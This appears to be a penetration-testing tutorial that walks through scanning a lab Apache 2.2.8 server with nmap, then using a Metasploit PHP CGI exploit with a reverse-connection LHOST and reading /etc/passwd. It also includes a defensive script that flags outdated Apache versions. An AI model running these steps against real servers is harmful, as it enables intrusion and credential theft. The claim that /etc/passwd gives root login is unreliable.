Apache is widely used on hundreds of thousands of web servers across the internet, so the chances of finding Apache servers running older versions are high, and with hundreds of vulnerabilities coming to light over the years it is all too easy to find an exploit for an older version and gain a root shell. Here we find a server running Apache 2.2.8 on port 80 and show how we can then fully compromise the server in under 3 minutes and access the password file.
We touch on this time and again: it is vital to stay up to date with application and OS versions. This again shows that if you are not updating even one component on your web server, it is at risk of being compromised very quickly.
In this tutorial we are using just nmap and the Metasploit Framework, which are built into Kali Linux, which we use for most of our tutorials. Download is here: https://www.kali.org/downloads/
First we scan the web server, which has an IP address of 192.168.56.103, with nmap to identify open ports and the services running on those ports using the following command.
nmap -sV -sT --version-all -p 80 192.168.56.103
There is a great cheat sheet here for nmap commands to help better understand what we are doing: https://www.stationx.net/nmap-cheat-sheet/
This shows us that port 80 is open, that it is running Apache, and it gives us the version. All we do from here is go googling to find vulnerabilities for that version, and the year that version came out. Then we can choose either to target the version directly or find an exploit that came out after that version was released. You can use CVE numbers for that, as the first part denotes the year it was discovered.
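As an added example (not part of the original tutorial), the following Python script parses nmap -sV output like the scan above and flags any Apache banner below a patch baseline; it is the inventory check a defender can run over their own hosts before someone else runs the same scan. The nmap output and the baseline version are constructed for this example, not captured from the demo machine.

```python
import re

# Constructed sample of nmap -sV normal output (not captured from a real host).
# The first host mirrors the page's scenario; the second is a patched control host.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.56.103
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)

Nmap scan report for 192.168.56.110
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.58 ((Ubuntu))
"""

# Hypothetical patch baseline for this example; set it to the version your own fleet must run.
MINIMUM_APACHE = (2, 4, 0)

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s+Apache httpd (\d+)\.(\d+)\.(\d+)")


def parse_apache_versions(nmap_text):
    """Return [(host, port, (major, minor, patch))] for every Apache banner nmap reported."""
    results = []
    host = None
    for line in nmap_text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)   # remember which host the following port lines belong to
            continue
        m = PORT_RE.match(line)
        if m and host:
            port = int(m.group(1))
            version = tuple(int(x) for x in m.group(2, 3, 4))
            results.append((host, port, version))
    return results


def outdated_hosts(nmap_text, minimum=MINIMUM_APACHE):
    """Hosts whose banner version is below the baseline; tuple comparison orders 2.2.8 < 2.4.0."""
    return [(h, p, v) for h, p, v in parse_apache_versions(nmap_text) if v < minimum]


if __name__ == "__main__":
    for host, port, version in outdated_hosts(SAMPLE_NMAP_OUTPUT):
        print(f"{host}:{port} runs Apache {'.'.join(map(str, version))}, below baseline: schedule patching")
```

The banner is only a first signal: distribution packages often backport fixes without changing the advertised version, so confirm flagged hosts against the package manager before and after patching.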
Apache 2.2.8 was released on the 19th of January, 2008!! Let’s look for a CVE from after that date and one that is already available in metasploit framework.
I’m not going to teach you how to google…….but my search brought up a vulnerability in a php cgi script which was the default for that version of Apache. There will be loads of exploits available for this version due to its age; we just decided to use this one as it is super reliable for the video demo.
Let’s fire up metasploit and find it.
search type:exploit multi/http/php
We could have also searched by date. Anyway, the one we want is number 0, so we simply type
It has already configured a payload for us so we check the info on the exploit
Once we’re happy we check which options we need to add to allow it to run.
We can see in the options what is required and what is not by reading the “required” column.
- RHOSTS – The remote hosts, i.e. the victim machine(s). We need to set the correct IP address so the exploit knows which machine(s) to target.
- LHOST – The listening host. This is your own machine’s IP address, so the exploit knows which machine to connect back to with the remote session it spawns.
We do this by using the “set” command:
set RHOSTS 192.168.56.103
set LHOST 192.168.56.106
Now that we have everything configured we just give the “run” command, which starts the exploit against the victim, and you can see from the video just how quick it is.
All we do now is access the password file by using;
“cat” outputs the file contents to the console, and “/etc/passwd” is the path and file name of the password file. With this we can log in as admin/root and do whatever we want.